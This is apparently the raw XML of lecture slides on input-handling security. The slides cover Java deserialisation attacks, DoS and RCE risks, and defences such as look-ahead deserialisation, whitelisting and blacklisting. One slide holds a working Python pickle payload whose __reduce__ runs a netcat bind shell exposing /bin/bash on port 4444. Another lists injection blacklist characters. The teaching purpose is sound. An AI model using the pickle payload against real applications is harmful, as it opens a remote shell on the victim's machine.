              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>contains </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>other objects, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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readObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> will execute the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>deserialisation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code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>for that class</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="10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So: attacker can execute </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>deserialisation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> code for any class on the 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CLASSPATH</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"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Subtle issue: the cast is only performed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>after </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>deserialization</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="16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If this object is later discarded as garbage, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> because the cast fails, the garbage collector will invoke its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finalize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> methods</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="10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So: attacker can execute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finalize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> method for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>any class on 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CLASSPATH</a:t>
            </a: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Countermeasure: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Look-Ahead Java </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Deserialisation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000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to white-list which classes are allowed to be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>deserialised</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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738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exploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>deserialisation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> ? 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accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DoS</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB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For example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Attacker serialises a recursive object structure, and deserialization unwinds the recursion and never terminates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Attacker edits a serialised object to set an array length to MAX_INT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8185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exploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>deserialisation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> ? 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Remote </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ode Execution (RCE)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Possible by abusing rich functionality offered by commonly used libraries (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>WebLogic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>IBM WebSphere</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1"/>
              <a:t>JBoss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>, Jenkins, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>OpenNMS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>, Adobe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>Coldfusion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>…) 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May even be possible from scratch, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> in python</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0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DEFAULT_COMMAND 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= "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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netcat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-c '/bin/bash -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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' -l -p 4444"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0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COMMAND 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= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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sys.argv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[1] if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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len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n-GB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sys.argv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) &gt; 1 else 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DEFAULT_COMMAND</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB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class </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>PickleRCE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(object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):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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def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__reduce__(self):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0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import </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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os</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB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return 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n-GB" sz="1600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os.system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,(COMMAND,))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="2" indent="0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If a python application </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>unpickles</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> inputs, then this pickled input will provides an attacker with RCE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8846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9803"/>
            <a:ext cx="5867400" cy="478872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276225"/>
            <a:ext cx="7761288" cy="685009"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" i="1" dirty="0"/>
              <a:t>How would you attack this web site?</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2400" baseline="-25000" dirty="0">
              <a:latin typeface="Pieces NFI" panose="02000000000000000000" pitchFamily="2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3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" altLang="nl-NL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="7" name="Rechte verbindingslijn met pijl 6"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3301997" y="1669733"/>
            <a:ext cx="2779848" cy="212597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Rechte verbindingslijn met pijl 7"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2775127" y="3034340"/>
            <a:ext cx="3306718" cy="88536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Rechte verbindingslijn met pijl 8"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2987824" y="4165460"/>
            <a:ext cx="3094021" cy="55968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Rechte verbindingslijn met pijl 12"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="1835696" y="4320532"/>
            <a:ext cx="4320480" cy="76465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5" name="Tekstvak 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6151933" y="3674201"/>
            <a:ext cx="194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C00000"/>
                </a:solidFill>
                <a:latin typeface="Pieces NFI" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>INPUT</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="4000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
              <a:latin typeface="Pieces NF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Defenses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Input Validation, Sanitisation, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Escaping, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Encoding, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Filtering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a: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2321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Recall: Defensive techniques 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8000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Prevent</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:srgbClr val="008000"/>
              </a:solidFill>
            </a:endParaRP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Typically by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>secure input handling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But also: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>secure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>output</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  handling</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>! 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bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Mitigate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> the potential impact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2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Reduce the expressive power of inputs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2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Reduce </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>priviliges</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, or                                                                          isolate aka sandbox aka compartmentalise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1714500" lvl="3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/>
                </a:solidFill>
              </a:rPr>
              <a:t>Do not run your web server as root</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1714500" lvl="3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2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Do not run your customer web server on same machine as your salary administration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1714500" lvl="3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2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Run JavaScript inside browser sandbox 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bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Detection &amp; react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2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Monitor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sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>to see if things go/have gone wrong</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
            </a:endParaRP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2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Keep logs if only for forensics afterwards</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="1" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod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31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489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validation &amp; sanitisation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The</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> standard defence against malicious input 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00050"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>‘Lack of input validation’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>is common term for all input attacks, but this is a bit of a misnomer, as we will see  later.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050"/>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Different ingredients: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GB" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>  to validate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> sanitise?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GB" dirty="0" smtClean="0"/>
              <a:t>How to spot  illegal inputs ?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GB" dirty="0" smtClean="0"/>
              <a:t>What to do with them?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GB" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Where</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>  to validate / sanitise?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100"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53242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u="sng" dirty="0" smtClean="0"/>
              <a:t>How</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>  to validate or sanitise?</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB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632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1. Validation techniques</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="nl-NL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nl-NL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>I</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ndirect selection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Let user choose from a set of legitimate inputs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U</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ser input never used directly by the application, and input does contaminate and taint other data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Most secure, but cannot be used in all situations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Also, attacker may be able to by-pass the user interface, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> by messing with HTTP traffic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>White-listing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List valid patterns; input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" sz="1800" i="1" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rejected</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" sz="1800" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> unless it matches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Secure, and can be used in all situations                                             </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Black-listing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List invalid patterns;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" sz="1800" i="1" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>accepted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" sz="1800" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> unless it matches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L</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>east secure, given the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>big</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> risk that some dangerous patterns are overlooked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endParaRPr lang="en-US" altLang="nl-NL" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRPr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04ED88A1-B3C9-4439-A8E9-4ACAF8707CFD}" type="slidenum">
              <a:rPr lang="en-GB" altLang="nl-NL" smtClean="0"/>
              <a:pPr/>
              <a:t>34</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB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4552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Black-listing vs white-listing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Black-listing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                                                                                                          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>Eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t> reject inputs that contain</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB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GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t> to prevent SQL injection </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB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800" dirty="0" smtClean="0"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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800" dirty="0" smtClean="0"/>
              <a:t> to prevent HTML injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB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&lt;script&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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&lt;/script&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>to prevent XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB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| &lt; &gt; &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>prevent OS command injection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800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Warning: these blacklists are very incomplete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dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>White-listing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:                                                                                                      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> only accept inputs with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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a..zA..Z0..9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2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to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>prevent SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>or HTML injection </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB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934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Validation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0"/>
              <a:t>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 smtClean="0"/>
              <a:t>For </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>numbers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>positive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
